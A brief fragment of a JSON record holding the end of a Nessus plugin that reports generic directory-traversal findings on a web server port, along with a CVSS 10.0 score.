+ '\\n';\n }\n if (!thorough_tests)\n report +=\n '\\n' +\n 'Note that Nessus stopped searching after one exploit was found. To\\n' +\n 'report all known exploits, enable the \\'Perform thorough tests\\'\\n' +\n 'setting and re-scan.\\n';\n\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n set_kb_item(name: strcat(\"www/\", port, \"/generic_traversal\"), value: TRUE);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}